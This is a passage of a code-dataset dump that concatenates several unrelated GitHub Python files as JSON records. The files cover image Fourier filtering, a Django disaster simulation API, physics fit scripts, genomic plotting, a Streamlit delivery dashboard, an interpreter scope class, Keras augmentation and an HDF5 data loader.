complex(np.cos(angle), np.sin(angle))\n\t\t\tresult += data[x, y] * e_part\n\n\treturn result\n\ndef f(u, v):\n\tresult = data[u, v]\n\tresult = (-1)**(u + v) * result\n\n\treturn result\n\n# get the image's information\t\nimage_name = 'sample2'\nimage_type = '.bmp'\nim = Image.open(image_name + image_type)\ndata = im.load()\nM, N = im.size\nfloat_M = round(M, 4)\nfloat_N = round(N, 4)\npixel = [[0.0 for i in range(N)] for j in range(M)]\n\n# multiply the input image by (-1)**(x+y) to center the transform for filtering\nfor u in range(M):\n\tfor v in range(N):\n\t\tpixel[u][v] = f(u, v)\n\n# do the fourier transform for the pixel in (u, v)\nfor u in range(M):\n\tfor v in range(N):\n\t\tpixel[u][v] = F(u, v, float_M, float_N)\n\ncoeff = 0.9\n\n# Multiply the resulting (complex) array by a real filter function \nfor u in range(M):\n\tfor v in range(N):\n\t\tpixel[u][v] = real_filter(pixel[u][v], coeff)\n\nresultImage = Image.new('L',(M, N), 'white')\ndraw = ImageDraw.Draw(resultImage)\n\nfor i in range(M):\n\tfor j in range(N):\n\t\t\tdraw.point((i, j), count_energy(pixel[i][j]))\n\n#save the output files\nresultImage.save(image_name + '_result_b.bmp', format='BMP')\n","repo_name":"FionaT/Digital-Image-Processing_Proj","sub_path":"proj_4/0401/0401_b.py","file_name":"0401_b.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31981786356","text":"from django.conf import settings\nfrom simulation.simulation import CityMap, DisasterSimulation\nfrom control_room.models import PoliceStation, Hospital, FireStation\nfrom pprint import pprint\nfrom rest_framework.response import Response\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom rest_framework import views\nimport ast\n\n\nclass RunSimulationView(views.APIView):\n\n\n \n\n def get(self, request):\n\n police_stations_coordinates = [[(p.latitude, p.longitude), p.name, p.capacity, p.vehicles_available] for p in PoliceStation.objects.all()]\n hospitals_coordinates = [[(h.latitude, 
h.longitude), h.name, h.capacity, h.vehicles_available] for h in Hospital.objects.all()]\n firestations_coordinates = [[(f.latitude, f.longitude), f.name, f.capacity, f.vehicles_available] for f in FireStation.objects.all()]\n #http://127.0.0.1:8000/simulation/run?lat=53.338400&long=-6.246793&policecars=2&ambulances=1&firetrucks=0\n try:\n\n pprint(request.query_params)\n policecars = int(request.query_params.get(\"policecars\", 0))\n firetrucks = int(request.query_params.get(\"firetrucks\", 0))\n ambulances = int(request.query_params.get(\"ambulances\", 0))\n lat = float(request.query_params[\"lat\"])\n long = float(request.query_params[\"long\"])\n disaster_coordinates = (lat, long)\n # use this\n city_map = CityMap(settings.G, self.police_stations_coordinates, self.hospitals_coordinates, self.firestations_coordinates)\n sim = DisasterSimulation(city_map, disaster_coordinates)\n data = sim.run(policecars=policecars, firetrucks=firetrucks, ambulances=ambulances)\n # use till here\n response = Response(data)\n except Exception as e:\n response = Response({\"error\": str(e)})\n \n return response\n\n","repo_name":"talhabinijaz576/DisasterResponse","sub_path":"simulation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"30744023210","text":"import re\r\nimport os\r\nimport sys\r\n\r\n\r\nSUBRULES = (\r\n\t(re.compile(\"^1\"), \"\"),\r\n\t(re.compile(\"\\\"\\\"\"), \"\\\"\"),\r\n\t(re.compile(\"(\\S)\\[\"), \"\\g<1> [\"),\r\n\t)\r\n\r\ndef sub(content):\r\n\tfor parser, repl in SUBRULES:\r\n\t\tcontent = parser.sub(repl, content)\r\n\treturn content\r\n\r\ndef main(target):\r\n\tfiles = filter(lambda x: x.endswith(\".txt\"), os.listdir(target))\r\n\tfor filename in files:\r\n\t\twith open(filename, 'r') as f:\r\n\t\t\tcontent = f.read()\r\n\t\twith open(filename, 'w') as f:\r\n\t\t\tf.write(sub(content))\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain(sys.argv[1])","repo_name":"muma378/Utils","sub_path":"utils/substitute.py","file_name":"substitute.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20761202001","text":"import os\nimport sys\nfrom multiprocessing import Pool\nimport amptools_cfg\n\nfit_name = sys.argv[1]\nnbins = int(sys.argv[2]) \nnfits = int(sys.argv[3])\nnprocess = int(sys.argv[4]) \nseed_file = 'param_init.cfg'\ncfg_file_name = 'amptools.cfg'\ndata_dir = fit_name\nbase_directory = os.getcwd()\n\n# setup config file settings\ncfg_file = amptools_cfg.amptools_cfg()\ncfg_file.set_data([runPeriod+'_'+polAngle for runPeriod in ['DATA'] for polAngle in ['000', '045', '090', '135']])\n#cfg_file.set_data([runPeriod+'_'+polAngle for runPeriod in ['sp17', 'sp18', 'fa18'] for polAngle in ['000', '045', '090', '135']])\ncfg_file.set_particles('Beam Proton KShort KLong')\ncfg_file.set_fname(cfg_file_name)\ncfg_file.set_fit_name(fit_name)\ncfg_file.set_amplitudes('sdme')\n#cfg_file.set_pol_info([[1.77, 0.38], [47.85, 0.38], [94.50, 0.38], [138.43, 0.38]])\n# cfg_file.set_include_bkg(False)\n\ndef pwa_setup(nbins, base_directory):\n\tpaths = []\n\n\tfor i in range(nbins):\n\t\tpath = base_directory+'/'+data_dir+'/bin_'+str(i)\n\n\t\tif not os.path.exists(f'{path}/fits_results/'):\n\t\t\tos.mkdir(path+\"/fits_results/\")\n\n\t\tif os.path.exists(f'{path}/nominal.fit'):\n\t\t\tprint(f'removing {path}/nominal.fit')\n\t\t\tos.system(f'rm 
{path}/nominal.fit')\n\n\t\tif os.path.exists(path+'/fit.log'):\n\t\t\tprint(f'removing {path}/fit.log')\n\t\t\tos.system(f'rm {path}/fit.log')\n\n\t\tif nfits > 1:\n\t\t\tcfg_file.set_parRange(True)\n\n\t\tos.chdir(path)\n\t\tif not os.path.exists(f'{path}/amptools.cfg'):\n\t\t\tcfg_file.set_ext(f'_{i}')\n\t\t\tcfg_file.write_amptools_config()\n\n\t\tpaths.append(path)\n\n\treturn paths\n\ndef run_fit(path):\n\tprint(f'Move to directory {path}')\n\tos.chdir(path)\n\n\tcmd = f'fit -c amptools.cfg -s {seed_file} -r {nfits} > fit.log'\n\tprint(cmd)\n\tos.system(cmd)\n\n\tprint('done fitting in '+path)\n\n\tcmd = f'cp {fit_name}.fit nominal.fit'\n\tos.system(cmd)\n\n\tcmd = f'mv {fit_name}*.fit fits_results/'\n\tos.system(cmd)\n\nif __name__ == '__main__':\n\tpaths = pwa_setup(nbins, base_directory)\n\n\tif nprocess == 1:\n\t\tfor path in paths:\n\t\t\trun_fit(path)\n\telse:\n\t\tp = Pool(nprocess)\n\t\tp.map(run_fit, paths)\n","repo_name":"gabyrod7/ksmisskl_gabyrod_gluex1_PhiSDME","sub_path":"sdme/sdme_scripts/fitsdme.py","file_name":"fitsdme.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"791777048","text":"import pyfaidx \nimport torch\nfrom torch import nn\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport seaborn as sns\nimport math\nimport pandas as pd\n\nimport sys\nsys.path.append('../models')\nfrom Beluga import Beluga\n\n\n\ndef get_data(input_file_path, file_index):\n \"\"\"\n Retrieves data saved by the predict method\n \n Args:\n input_file_path : str\n The path to an input file saved from predict\n \n file_index : int\n The index of the inputs file to be plotted by the plot method\n \n \"\"\"\n data = torch.load(input_file_path)\n \n #Raise exception if multiple input file is provided but an index is not\n if type(data['center_pos']) == list and file_index == None:\n raise Exception(\"If an input file contains multiple predictions, a file index must also be specified\")\n \n \n i = 0 if file_index == None else int(file_index) - 1\n \n \n center_pos = data['center_pos'] if type(data['center_pos']) != list else data['center_pos'][i]\n return data[\"prediction\"][i], data[\"reference\"][i], center_pos, data[\"diff\"]\n \n\n\n\ndef encode_sequence(chrome_num, pos):\n \"\"\"\n Returns a sequence from chromosome chrome_num centered at position pos encoded\n as a 4xlength tensor\n \n Args:\n chrome_num : str\n The chromosome to be sample from (e.g chr11)\n \n position : int\n Center position of the chromosome to be sample from\n \n genome : fasta object\n The genome that sequences are drawn from\n \n length : int\n Length of input sequence\n \n Returns:\n seq_encoded : torch.tensor\n encoded version of the input sequence\n \n\n \"\"\"\n seq = str(genome[chrome_num][pos-1000:pos+1000])\n\n #define the encoding\n encoding_dict = {'A': torch.tensor([1, 0, 0, 0]), 'G': torch.tensor([0, 1, 0, 0]),\n 'C': torch.tensor([0, 0, 1, 0]), 'T': torch.tensor([0, 0, 0, 1]),\n 'N': torch.tensor([0, 0, 0, 0]), 'H': torch.tensor([0, 0, 0, 0]),\n 'a': torch.tensor([1, 0, 0, 0]), 'g': torch.tensor([0, 1, 0, 0]),\n 'c': torch.tensor([0, 0, 1, 0]), 't': torch.tensor([0, 0, 0, 1]),\n 'n': torch.tensor([0, 0, 0, 0]), '-': torch.tensor([0, 0, 0, 0])}\n \n\n \n #create a encoded sequence \n seq_encoded = torch.zeros((4, len(seq)))\n \n \n for i in range(len(seq)):\n seq_encoded[:,i] = encoding_dict[seq[i]]\n\n \n return seq_encoded.unsqueeze(0)\n\n\n\n\ndef plot_letters(axs, motifs, 
colors, ppr):\n \"\"\"\n Given an axis and array of reference allele indices, plot letters on the heatmap\n \n Args:\n axs : Matplotlib axes\n Axes object to plot on\n \n Motifs : List\n A list of numbers representing the letters to be plotted\n \n Colors : (int,int,int) tuple\n Tuple representing the RGB value of the letter to be plotted\n \n ppr : int\n position-per-row is the number of positions plotted in each row of the output plit\n \n \n \"\"\"\n scaled_font_size = round(12 / (ppr/200),2)\n for i in range(len(colors)):\n color = colors[i]\n\n if motifs[i] == 0:\n axs.text(i + 0.25,0,\"A\", fontsize = scaled_font_size, color = color, fontfamily = \"monospace\", fontweight = \"bold\")\n\n if motifs[i] == 1:\n axs.text(i + 0.25,0,\"G\", fontsize = scaled_font_size, color = color, fontfamily = \"monospace\", fontweight = \"bold\")\n\n if motifs[i] == 2:\n axs.text(i + 0.25,0,\"C\", fontsize = scaled_font_size, color = color, fontfamily = \"monospace\", fontweight = \"bold\")\n\n if motifs[i] == 3:\n axs.text(i + 0.25,0,\"T\", fontsize = scaled_font_size, color = color, fontfamily = \"monospace\", fontweight = \"bold\")\n \n \n \ndef get_colors(array, diff = False):\n \"\"\"\n Return the colors of the letters to be plotted on the graph\n \n Args:\n array : torch.tensor\n array containing the average values of the Multiplexer predictions made from the alternative sequences\n \n diff : bool\n whether the --diff option was used\n \n Returns:\n colors : list\n a list contain tuples of RGB values of colors\n \n \n \"\"\"\n colors = []\n if diff:\n \n minval = torch.abs(array[array < 0]).max().item()*0.5 #abs value of the min\n maxval = array.max().item()\n primary_color = 0.9\n for i in array:\n \n if i < 0:\n if (-1*i.item()) > (maxval): i = torch.tensor(maxval)\n second_color = round(0.9 - (0.9)/(minval)*(torch.abs(i).item()), 2)\n color = (second_color, second_color, primary_color)\n elif i == 0:\n color = (0.9, 0.9, 0.9)\n elif i > 0:\n second_color = round(0.9 - (0.9)/(maxval)*(torch.abs(i).item()), 2)\n color = (primary_color, second_color, second_color)\n \n colors.append(color)\n\n \n else:\n minval = 0\n maxval = torch.abs(array[array < 0]).max().item()*0.5 #max negative value\n for i in array:\n if i < 0:\n if (-1*i.item()) > (maxval): i = torch.tensor(maxval) #all negative values would be set to this\n color = round(0.9 - (0.9)/(maxval - minval)*(torch.abs(i).item() - minval), 2)\n \n else:\n color = 0.9\n \n colors.append( (color, color, color) )\n \n \n return colors\n \n \n \n\ndef create_plot(plot_index, plot_array, letters, colors, x_ticks, figname, target_names = None, ppr = None, figsize = None, output_format = None):\n \"\"\"\n This method creates the plots and saves them as a pdf file\n \n Args:\n plot_arry : torch.tensor\n array to be plotted\n \n letters : list\n list of letters representing the reference allele to be plotted\n \n colors : list\n list of tuples representing the color of letters to be plotted\n \n x_ticks : lsit\n a list of x-axis labels\n \n figname : str\n name of plot\n \n ppr : int\n positions per row\n \n figsize : tuple\n size of plot\n \n output_format : str\n format of output plot (e.g 'pdf')\n \n \n \"\"\"\n #define optional arguments\n ppr = 200 if ppr == None else ppr \n figsize = (50,50) if figsize == None else figsize\n output_format = 'pdf' if output_format == None else output_format\n \n \n \n #calculate plot shapes and sizes\n total_plots = math.ceil(plot_array.shape[0]/ppr)\n remainder = plot_array.shape[0] % ppr #the number of positions 
to be plotted on the final plot\n \n \n \n min_val = plot_array.min()\n max_val = plot_array.max()\n\n \n fig = plt.figure(figsize = figsize)\n \n fig.subplots_adjust(hspace = 2)\n \n plot_dict = {}\n for i in range(1, total_plots + 1):\n plot_dict[\"ax\" + str(i)] = fig.add_subplot(total_plots,1,i) \n \n\n if remainder > 0:\n filler = torch.zeros((ppr - remainder,4))\n plot_array = torch.cat((plot_array, filler), axis = 0)\n x_ticks += [0 for i in range(ppr - remainder)]\n \n for j in range(1, total_plots + 1):\n \n plot_letters(plot_dict['ax' + str(j)], letters[(j-1)*ppr:j*ppr], colors[(j-1)*ppr:j*ppr], ppr)\n ret = sns.heatmap(plot_array[(j-1)*ppr:j*ppr].T, cbar=True, center = 0, vmin = min_val, vmax = max_val, ax = plot_dict['ax' + str(j)], cmap = 'RdBu_r')\n \n\n if j == 1: \n if target_names:\n file = open(target_names)\n names = file.read().split(\"\\n\")\n title = names[plot_index]\n \n else:\n title = \"Target Index Plotted: \" + str(plot_index)\n \n \n mpl.rcParams['axes.titlesize'] = 40\n ret.set_title(title, y = 1.3)\n \n \n ret.set_yticks([i + 0.5 for i in range(4)])\n ret.set_yticklabels(labels = ['A','G','C','T'], rotation =0)\n ret.set_xticks([i*5 + 0.5 for i in range(int(math.ceil(ppr/5)))])\n ret.set_xticklabels(x_ticks[(j-1)*ppr:j*ppr:5], fontsize = 10)\n \n if j == total_plots and remainder != 0:\n xticks = plot_dict['ax' + str(j)].xaxis.get_major_ticks()\n \n\n for i in range(int(math.ceil(remainder/5)), int(ppr/5) + 1):\n xticks[i].set_visible(False)\n \n\n plt.savefig(\"./newSaves/\" + figname + \".\" + output_format, format = output_format)\n \n \n\ndef plot(input_file_path, output_name, ppr, file_index = None, target_names = None, user_index = None, figsize = None, output_format = None):\n \"\"\"\n This method formats the data, sets up the coloring scheme, and determines the values to plot\n \n Args:\n input_file_path : str\n Which values to plot. This should be a filed saved from the predictions method\n \n output_name : str\n Name of file where the output plot is saved\n \n ppr : int\n positions per row\n \n file_index : int\n The index of a prediction tensor (saved by the predict method) to be plotted. This argument is required if users \n provide an input file that contains the Multiplexer prediction for multiple inputs.\n \n user_index : int\n The index of the predicted feature to plot\n \n figsize : tuple (int,int)\n The size of the saved figured. Default = (50,50)\n \n output_format : str\n The output format of the plot e.g. 
'pdf', 'png', etc.\n \n \n \"\"\"\n figsize = (50,50) if figsize == None else (int(figsize.split(\",\")[0]), int(figsize.split(\",\")[1]))\n \n #call model on the inputs\n Predicted_chromatin_profiles, reference, position, diff = get_data(input_file_path, file_index)\n length = reference.shape[-1]\n ppr = 200 if ppr == None else int(ppr)\n\n \n \n ref_indices = []\n for i in range(length):\n if reference[:,i].sum() == 0: #in the case the reference nucleotide was 'n'\n ref_index = 0\n else:\n ref_index = torch.nonzero(reference[:,i]).item()\n\n ref_indices.append(ref_index)\n\n\n #get mean alternative predictions\n \n \n alt_predictions = Predicted_chromatin_profiles * (reference!=1)[ None,:,:] \n alt_predictions = alt_predictions.sum(axis=1)/3\n alt_predictions = alt_predictions\n \n\n\n if user_index:\n plot_index = int(user_index)\n \n else:\n #get strongest index#\n max_arr = alt_predictions.min(axis = 1)\n plot_index = torch.argmin(max_arr[0]).item()\n\n\n\n plot_array = Predicted_chromatin_profiles[plot_index, :, :].T.detach()\n predictions = alt_predictions[plot_index, :]\n plot_array[torch.arange(length), ref_indices] = 0\n \n\n\n #get letters to plot\n letters = ref_indices #plot the letters\n x_ticks = [i for i in range(position - int(math.floor(length/2)) + 1, position + int(math.ceil(length/2)) + 1)] \n letter_colors = get_colors(predictions, diff)\n \n\n\n\n create_plot(plot_index, plot_array.detach().cpu(), letters, letter_colors, x_ticks, output_name, target_names, ppr, figsize, output_format)\n\n","repo_name":"jzhoulab/Multiplexer","sub_path":"CLI/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":11582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"35839986105","text":"#=================================================================\n#Bibliotecas\n#=================================================================\n\nimport pandas as pd\nimport folium\nimport plotly.express as px\nimport streamlit as st\nfrom PIL import Image\nimport plotly.graph_objects as go\nfrom streamlit_folium import folium_static\nfrom haversine import haversine\nimport numpy as np\n\n\n# ================================================================\n# Funções\n# =================================================================\ndef clean_dados(df):\n \n \"\"\"\n Essa função é responsável por fazer a limpeza dos dados\n 1 - Irá remover as colunas que tem os espaços\n 2 - Irá apagar as linhas que tem os valor nulos (NaN)\n 3 - Conversão de algumas coluanas categóricas para numericas\n 4 - Criação de uma nova coluna ['distance'] que mostra a distância média do restaurante para o cliente\n 5 - Criação da coluna [week_of_year]\n \"\"\"\n #Limpeza dos dados\n #Eliminando os espaços vazios\n df.loc[:, 'ID'] = df.loc[:, 'ID'].str.strip()\n df['Delivery_person_Age'] = df['Delivery_person_Age'].str.strip()\n df['Delivery_person_ID'] = df['Delivery_person_ID'].str.strip()\n df['Weatherconditions'] = df['Weatherconditions'].str.strip()\n df['Road_traffic_density'] = df['Road_traffic_density'].str.strip()\n df['Type_of_order'] = df['Type_of_order'].str.strip()\n df['Type_of_vehicle'] = df['Type_of_vehicle'].str.strip()\n df['Festival'] = df['Festival'].str.strip()\n df['City'] = df['City'].str.strip()\n\n # Eliminando as linhas que tem o conteu 'NaN'\n linhas_vazias = df['Delivery_person_Age'] != 'NaN'\n df = df.loc[linhas_vazias, :].copy()\n\n linhas_vazias = df['Road_traffic_density'] != 'NaN'\n df = df.loc[linhas_vazias, 
:]\n\n linhas_vazias = df['Festival'] != 'NaN'\n df = df.loc[linhas_vazias, :]\n\n linhas_vazias = df['City'] != 'NaN'\n df = df.loc[linhas_vazias, :]\n\n #Limpando a coluna Time Taken\n df['Time_taken(min)'] = df['Time_taken(min)'].apply(lambda x: x.split( '(min) ')[1])\n\n #convertendo as colunas\n df['Delivery_person_Age'] = df['Delivery_person_Age'].astype(int)\n df['Time_taken(min)'] = df['Time_taken(min)'].astype(int)\n df['Delivery_person_Ratings'] = df['Delivery_person_Ratings'].astype(float)\n df['Order_Date'] = pd.to_datetime( df['Order_Date'], format='%d-%m-%Y' )\n\n # Resetando o index\n df = df.reset_index(drop=True)\n\n # Crianda a coluna da semana\n df['week_of_year'] = df['Order_Date'].dt.strftime( \"%U\" )\n # Criando a coluna da distancia\n cols = ['Restaurant_latitude', 'Restaurant_longitude', 'Delivery_location_latitude', 'Delivery_location_longitude']\n df['distance'] = df.loc[:, cols].apply(lambda x: haversine( (x['Restaurant_latitude'], x['Restaurant_longitude']),(x['Delivery_location_latitude'],x['Delivery_location_longitude']) ),axis=1)\n return (df)\n\ndef order_by_day(df):\n \"\"\"\n Esta função irá plotar o gráfico de barra das colunas ID e Order_Date\n \"\"\"\n df_aux = df.loc[:, ['ID', 'Order_Date']].groupby('Order_Date').count().reset_index()\n fig = px.bar(df_aux, x='Order_Date', y='ID')\n return fig\n\ndef traffic_order_share(df):\n \"\"\"\n Esta função irá plotar o gráfico de pizza da colunas ID e Road_Traffic_density\n \"\"\"\n df_aux = df.loc[:, ['ID', 'Road_traffic_density']].groupby('Road_traffic_density').count().reset_index()\n fig = px.pie(df_aux, values='ID', names='Road_traffic_density')\n return fig\n\ndef order_volume_city_traffic(df): \n \"\"\"\n Esta função irá plotar o gráfico de Scatter das colunas City e Road_traffic e volume será pela coluna ID\n \"\"\"\n df_aux = df.loc[:, ['ID', 'City', 'Road_traffic_density']].groupby(['City', 'Road_traffic_density']).count().reset_index()\n fig= px.scatter(df_aux, x='City', y='Road_traffic_density',size='ID', color='City')\n st.plotly_chart(fig, use_container_width=True) \n return fig\n\ndef order_by_week(df):\n \"\"\"\n Esta função irá plotar o gráfico de linha das colunas Week_of_year e ID\n \"\"\"\n df_aux = df.loc[:, ['ID', 'week_of_year']].groupby('week_of_year').count().reset_index()\n fig = px.line(df_aux, x='week_of_year', y='ID', title='Quantidade de pedidos por semana')\n st.plotly_chart(fig, use_container_width=True)\n return fig\n\ndef delivery_per_week (df):\n \"\"\"\n Esta função irá plotar o gráfico de linha das colunas week_of_year e order_by_week\n \"\"\"\n df_aux1 = df.loc[:,['ID', 'week_of_year']].groupby('week_of_year').count().reset_index()\n df_aux2 = df.loc[:,['Delivery_person_ID', 'week_of_year']].groupby('week_of_year').nunique().reset_index()\n #Juntando as duas tabelas\n df_aux = pd.merge(df_aux1,df_aux2, how='inner')\n df_aux['order_by_week'] = df_aux['ID'] / df_aux['Delivery_person_ID']\n fig = px.line(df_aux, x='week_of_year', y='order_by_week')\n st.plotly_chart(fig, use_container_width=True)\n return fig\n\ndef country_maps(df):\n \"\"\"\n Esta função irá plotar o mapa das localidades dos restaurantes\n \"\"\"\n df_aux = (df.loc[:, ['City', 'Road_traffic_density', 'Delivery_location_latitude', 'Delivery_location_longitude']]\n .groupby(['City', 'Road_traffic_density'])).median().reset_index()\n\n map = folium.Map(zoom_start=1100)\n\n for index, location_info in df_aux.iterrows():\n folium.Marker([location_info['Delivery_location_latitude'],\n 
location_info['Delivery_location_longitude']],\n popup=location_info[['City', 'Road_traffic_density']] ).add_to(map)\n\n folium_static(map, width=1024, height=600)\n return map\n\n\n#--------------------------------------------------------------------------------\n#---------------------------------Início do código lógico------------------------\nst.set_page_config(page_title='Company_view', page_icon=':bird:', layout='wide', initial_sidebar_state='collapsed')\n#-----------------------------\n#Importação dos dados\n#-----------------------------\n#Leitura do arquivo\ndf1 = pd.read_csv('train.csv')\ndf = df1.copy()\n\n#-----------------------------\n#Dataframe limpo\n#-----------------------------\ndf = clean_dados(df)\n\n#=============================================================================\n# BARRA LATERAL\n#=============================================================================\nst.header('Marketplace - Visão Cliente')\nimagem = Image.open(\"logo.png\")\nst.sidebar.image(imagem, width=120)\nst.sidebar.markdown('# Cury Company')\nst.sidebar.markdown('## Fastest Delivery in Town')\nst.sidebar.markdown(\"\"\"______\"\"\")\nst.sidebar.markdown('Selecione uma data limite')\ndate_slider = st.sidebar.slider('Até qual valor?',\n value=pd.datetime(2022, 4, 13),\n min_value=pd.datetime(2022, 2, 11),\n max_value=pd.datetime(2022, 4, 13),\n format='DD-MM-YYYY')\nst.sidebar.markdown(\"\"\"______\"\"\")\ntraffic_option = st.sidebar.multiselect('Quais as condições do trânsito',\n ['Low', 'Medium', 'High', 'Jam'],\n default=['Low', 'Medium', 'High', 'Jam'])\nst.sidebar.markdown(\"\"\"______\"\"\")\nst.sidebar.markdown('### Powered by Comnunidade DS')\n\n#Filtro de data\nlinhas_selecionadas = df['Order_Date'] < date_slider\ndf = df.loc[linhas_selecionadas, :]\n\n#Filtro de trânsito\nlinhas_selecionadas = df['Road_traffic_density'] .isin(traffic_option)\ndf = df.loc[linhas_selecionadas, :]\n\n#=======================================================================\n# LAYOUT DO DASHBOARD\n#=======================================================================\ntab1, tab2, tab3 = st.tabs(['Visão Gerencial', 'Visão Tática', 'Visão Geográfica'])\n\nwith tab1:\n #Criando o container\n with st.container():\n # Order Metric\n st.header('Order by Day')\n fig = order_by_day(df) # Chamando a função\n st.plotly_chart(fig, use_container_width=True)\n\n col1, col2 = st.columns(2)\n with col1:\n st.header ('Traffic Orde Share')\n fig = traffic_order_share(df) # Chamando a função\n st.plotly_chart(fig, use_container_width=True)\n \n with col2:\n st.header ('Comparison of order volume by city and type of traffic')\n fig = order_volume_city_traffic(df) # Chamando a função\nwith tab2:\n st.header('Order by Week')\n fig = order_by_week(df) # Chamando a função\n \n st.header('number of orders per delivery person per week')\n fig = delivery_per_week(df) # Chamando a função\n \n \n \nwith tab3:\n st.header('Country Maps')\n map = country_maps(df) # Chamando a função\n ","repo_name":"francalfc/fastest_delivey_Curry","sub_path":"pages/1_visao_empresa.py","file_name":"1_visao_empresa.py","file_ext":"py","file_size_in_byte":8748,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74378242869","text":"from .exceptions import JAPLError\nfrom .tokenobject import Token\nfrom .expression import Variable\n\n\nclass Environment(object):\n \"\"\"\n A wrapper around a hashmap representing\n a scope\n \"\"\"\n\n def __init__(self, enclosing=None):\n \"\"\"Object 
constructor\"\"\"\n\n self.map = {}\n self.enclosing = enclosing\n\n def define(self, name: str, attr: object):\n \"\"\"Defines a new variable in the scope\"\"\"\n\n self.map[name] = attr\n\n def get(self, name: Token):\n \"\"\"Gets a variable\"\"\"\n\n if name.lexeme in self.map:\n return self.map[name.lexeme]\n elif self.enclosing:\n return self.enclosing.get(name)\n raise JAPLError(name, f\"Undefined name '{name.lexeme}'\")\n\n def get_at(self, distance, name):\n \"\"\"Gets a variable in a specific scope\"\"\"\n\n return self.ancestor(distance).map.get(name)\n\n def ancestor(self, distance):\n \"\"\"Finds the scope specified by distance\"\"\"\n\n env = self\n for _ in range(distance):\n env = env.enclosing\n return env\n\n def assign_at(self, distance, name, value):\n \"\"\"Same as get_at, but assigns instead of retrieving\"\"\"\n\n self.ancestor(distance).map[name.lexeme] = value\n\n def delete(self, var):\n \"\"\"Deletes a variable\"\"\"\n\n if var.name.lexeme in self.map:\n del self.map[var.name.lexeme]\n elif self.enclosing:\n self.enclosing.delete(var)\n else:\n raise JAPLError(var.name, f\"Undefined name '{var.name.lexeme}'\")\n\n def assign(self, name: Token, value: object):\n \"\"\"Assigns a variable\"\"\"\n\n if name.lexeme in self.map:\n if isinstance(value, Variable):\n self.map[name.lexeme] = self.get(value.name)\n else:\n self.map[name.lexeme] = value\n elif self.enclosing:\n self.enclosing.assign(name, value)\n else:\n raise JAPLError(name, f\"Undefined name '{name.lexeme}'\")\n","repo_name":"japl-lang/japl-python","sub_path":"JAPL/meta/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"5261553759","text":"from keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img\nimport numpy as np\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True, help=\"path to the input image\")\nap.add_argument(\"-o\", \"--output\", required=True, help=\"path to output directory to store augmentation examples\")\nap.add_argument(\"-p\", \"--prefix\", type=str, help=\"output filename prefix\")\nargs = vars(ap.parse_args())\n\nprint(\"[INFO] loading example image...\")\nimage = load_img(args[\"image\"])\nimage = np.expand_dims(image, axis=0)\n\naug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1, height_shift_range=0.1, \n\tshear_range=0.2, zoom_range=0.2, horizontal_flip=True, fill_mode=\"nearest\")\ntotal = 0\n\nprint(\"[INFO] generating images...\")\nimageGen = aug.flow(image, batch_size=1, save_to_dir=args[\"output\"], \n\tsave_prefix=args[\"prefix\"], save_format=\"jpg\")\n\nfor image in imageGen:\n\ttotal += 1\n\tif total == 10:\n\t\tbreak\n","repo_name":"TyroneLi/pyimagesearchcode","sub_path":"data_augmentation/augmentation_demo.py","file_name":"augmentation_demo.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"94"} +{"seq_id":"14602850450","text":"import h5py\nimport numpy as np\nimport FormatInterface\n\nclass HandelMCH5File(FormatInterface.FormatInterface):\n def __init__(self,inputFile,isGui):\n super().__init__()\n self.isGui=isGui\n self.inputFile = inputFile\n self.listOfRecordings = []\n self.listOfStreams = []\n self.extractedFile = []\n def GetData(self):\n try:\n tickPosition = 9\n self.extractedFile = h5py.File(self.inputFile,\"r\")\n self.listOfRecordings= 
self.ShowFileInnerSection(self.extractedFile['/Data/'])\n for recording in self.listOfRecordings:\n self.listOfStreams= self.ShowFileInnerSection(self.extractedFile['/Data/'+recording+'/AnalogStream/'])\n for stream in self.listOfStreams:\n self.timeStepMS= (self.extractedFile['/Data/' + recording + '/AnalogStream/' + stream + '/InfoChannel'][0])[tickPosition]*1e-3\n self.durationMS = (self.extractedFile['/Data/' + recording + '/AnalogStream/' + stream + '/ChannelDataTimeStamps'][0,2])* self.timeStepMS\n self. nChannels = len(np.array((self.extractedFile['/Data/' + recording + '/AnalogStream/' + stream + '/ChannelData'])[:, 0]))\n if (self.isGui == False):\n self.GetRelevantTimestamps()\n self.GetRelevantChannels()\n if (( self.startTimeIndex!=None) and ( self.endTimeIndex!=None) and ( self.startChannel!=None) and ( self.endChannel!=None) and ( self.timestamps[0]!=None)):\n self.metaData = np.array(\n (self.extractedFile['/Data/' + recording + '/AnalogStream/' + stream + '/ChannelData'])[ self.startChannel-1: self.endChannel, self.startTimeIndex: self.endTimeIndex])\n self.metaData=self.metaData.transpose()\n self.PlotData(self.isGui)\n else:\n print(\"Error Loading Data, Please Try Again\")\n except Exception as e:\n print(\"An exception occurred. Please Try Again\")\n print(e)\n return\n\n def GetAndPlotMetaData(self):\n self.metaData = np.array(\n (self.extractedFile['/Data/' +self.listOfRecordings[0] + '/AnalogStream/' + self.listOfStreams[0] + '/ChannelData'])[\n 0: self.nChannels, self.startTimeIndex: self.endTimeIndex])\n self.metaData = self.metaData.transpose()\n return 